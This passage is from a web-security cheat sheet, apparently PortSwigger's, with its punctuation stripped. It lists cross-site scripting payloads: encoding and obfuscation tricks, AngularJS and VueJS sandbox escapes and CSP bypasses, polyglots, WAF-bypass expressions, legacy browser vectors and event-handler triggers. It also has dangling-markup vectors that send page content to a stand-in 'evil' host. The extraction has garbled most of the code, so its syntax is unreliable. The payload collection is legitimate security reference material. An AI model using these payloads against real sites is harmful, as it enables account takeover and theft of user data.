ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt
Set windowname via formtarget attribute in altinputgt tag type image
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt
Special tags
Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt
Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 1
+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 2
+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 3
+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 4
+v +ADw-script+AD4-alert(1)+ADw-script+AD4-
Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt
Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt
Disable referer ltmeta name=referrer content=no-referrergt
Encoding
Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
Event handlers that do require user interaction
Event Description Code
onauxclick
Fires when right clicking or using themiddle button of the mouse
ltinput onauxclick=alert(1)gtCompatibility
onbeforecopy
Requires you copy a piece of text lta onbeforecopy=alert(1) contenteditablegttestltagtCompatibility
onbeforecut
Requires you cut a piece of text lta onbeforecut=alert(1) contenteditablegttestltagtCompatibility
onbeforepaste
Requires you paste a piece of text lta onbeforepaste=alert(1) contenteditablegttestltagtCompatibility
onchange
Requires as change of value ltinput onchange=alert(1) value=xssgtCompatibility
onclick
Requires a click of the element ltxss onclick=alert(1)gttestltxssgtCompatibility
onclose
Fires when a dialog is closed ltdialog open onclose=alert(1)gtltform method=dialoggtltbuttongtXSSltbuttongtltformgt
Compatibility
oncontextmenu
Triggered when right clicking to show thecontext menu
ltxss oncontextmenu=alert(1)gttestltxssgtCompatibility
oncopy
Requires you copy a piece of text ltxss oncopy=alert(1) value=XSS autofocus tabindex=1gttestCompatibility
oncut
Requires you cut a piece of text ltxss oncut=alert(1) value=XSS autofocus tabindex=1gttestCompatibility
ondblclick
Triggered when double clicking theelement
ltxss ondblclick=alert(1) autofocus tabindex=1gttestltxssgtCompatibility
ondrag
Triggered dragging the element ltxss draggable=true ondrag=alert(1)gttestltxssgtCompatibility
ondragend
Triggered dragging is finished on theelement
ltxss draggable=true ondragend=alert(1)gttestltxssgtCompatibility
ondragenter
Requires a mouse drag ltxss draggable=true ondragenter=alert(1)gttestltxssgtCompatibility
ondragleave
Requires a mouse drag ltxss draggable=true ondragleave=alert(1)gttestltxssgtCompatibility
ondragover
Triggered dragging over an element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondragover=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
ondragstart
Requires a mouse drag ltxss draggable=true ondragstart=alert(1)gttestltxssgtCompatibility
ondrop
Triggered dropping a draggable element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondrop=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
onfullscreenchange
Fires when a video changes full screenstatus
ltvideo onfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
oninput
Requires as change of value ltinput oninput=alert(1) value=xssgtCompatibility
oninvalid
Requires a form submission with anelement that does not satisfy itsconstraints such as a required attribute
ltformgtltinput oninvalid=alert(1) requiredgtltinput type=submitgtCompatibility
onkeydown
Triggered when a key is pressed ltxss onkeydown=alert(1) contenteditablegttestltxssgtCompatibility
onkeypress
Triggered when a key is pressed ltxss onkeypress=alert(1) contenteditablegttestltxssgtCompatibility
onkeyup
Triggered when a key is released ltxss onkeyup=alert(1) contenteditablegttestltxssgtCompatibility
onmousedown
Triggered when the mouse is pressed ltxss onmousedown=alert(1)gttestltxssgtCompatibility
onmouseenter
Triggered when the mouse is hoveredover the element
ltxss onmouseenter=alert(1)gttestltxssgtCompatibility
onmouseleave
Triggered when the mouse is movedaway from the element
ltxss onmouseleave=alert(1)gttestltxssgtCompatibility
onmousemove
Requires mouse movement ltxss onmousemove=alert(1)gttestltxssgtCompatibility
onmouseout
Triggered when the mouse is movedaway from the element
ltxss onmouseout=alert(1)gttestltxssgtCompatibility
onmouseover
Requires a hover over the element ltxss onmouseover=alert(1)gttestltxssgtCompatibility
onmouseup
Triggered when the mouse button isreleased
